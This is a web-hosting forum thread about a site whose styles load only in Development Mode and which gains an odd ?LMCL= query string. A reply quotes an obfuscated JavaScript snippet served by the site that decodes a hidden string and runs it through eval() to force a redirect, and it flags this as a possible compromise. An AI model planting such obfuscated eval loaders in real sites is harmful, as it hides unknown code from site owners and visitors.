So my website only seems to load all of the styles when I have Development Mode enabled. As soon as I turn it off it then doesn’t load any of the styles.
What is weird is it also now adds this string at the end of the URL ?LMCL=q7VF7N
Does anyone know what is going on and how to fix this issue?
As for the appended query string, this comes from your server. There are at least two instances where your server seems to send some obscure JavaScript/HTML combination which forces a redirect with that value
<html><body><script>function Fdt(tk,YM,p8){var XBYmb,PCn9a=new Array(),lHfDD="\xf3\x0a\xae\xf8\x8f\x69\x84\x66\x77\x17\xc3\x3a\xa6\x5c\x8a\xfc\x6c\x37\x39\xc5\xad\x17\x3a\x6d\xff\xd4\x6e\x82\xc7\xdc\x64\x6d\xb4\x59\xeb\x42\x00\x6e\x38\xab\x42\x4e\xd9\x58\x51\x5b\x1f\x14\x1d";for(XBYmb=0;XBYmb<lHfDD.length;XBYmb++)PCn9a[XBYmb]=lHfDD.charCodeAt(XBYmb);XBYmb=4;while(XBYmb<=35){PCn9a[XBYmb]=(PCn9a[XBYmb]+PCn9a[XBYmb+1])&0xff;PCn9a[XBYmb]=((PCn9a[XBYmb]<<7)&0xff)|(PCn9a[XBYmb]>>1);XBYmb++;}XBYmb=1;do{PCn9a[XBYmb]=(PCn9a[XBYmb]+PCn9a[XBYmb+1])&0xff;PCn9a[XBYmb]=(~PCn9a[XBYmb])&0xff;PCn9a[XBYmb]=PCn9a[XBYmb]^13;}while(++XBYmb<=40);XBYmb=37;for(;;XBYmb--){if(XBYmb<3)break;PCn9a[XBYmb]=((PCn9a[XBYmb]^182)+35)&0xff;}lHfDD="";for(XBYmb=1;XBYmb<PCn9a.length-1;XBYmb++)if(XBYmb%7)lHfDD+=String.fromCharCode(PCn9a[XBYmb]^tk);lHfDD+="";eval(lHfDD);}Fdt(61,"","");</script><br><br><br><center><h3><p>Your browser doesn't seem to support Javascript!</p></h3></center></body></html>
Whether that is intentional or your server has been compromised, is something I cant tell, though that obfuscated JavaScript code does seem a bit questionable. That is something for your site administrator to clarify however.
As for the stylesheets, right now the seem to load. I guess you have development mode on, correct? Development mode basically just disables caching, so it might be something related to that. You could either configure a page rule for /*.css and disable caching for it or check what the exact issue is and try to fix that instead.
If you dont have access to the server it will be difficult to do anything.
I would suggest you check your invoices and emails for whom you are paying for the service, respectively contact the person who is responsible for maintaining your site.
I am afraid the forum is a) not primarily intended for paid services and b) I’ll be only sporadically online in the next days, so I couldnt even really have a proper look, at least not straight away I am afraid .
Just to give you a start, the development issue will be something caching related. Check if your site dynamically creates CSS rules, which then get cached but are not valid any longer for subsequent requests (maybe dynamic CSS classes ).
As for the other issue, that is difficult to debug remotely. I’d start by search all files (and the database content) for the strings in question (e.g. “FiRbH2” and “support Javascript”).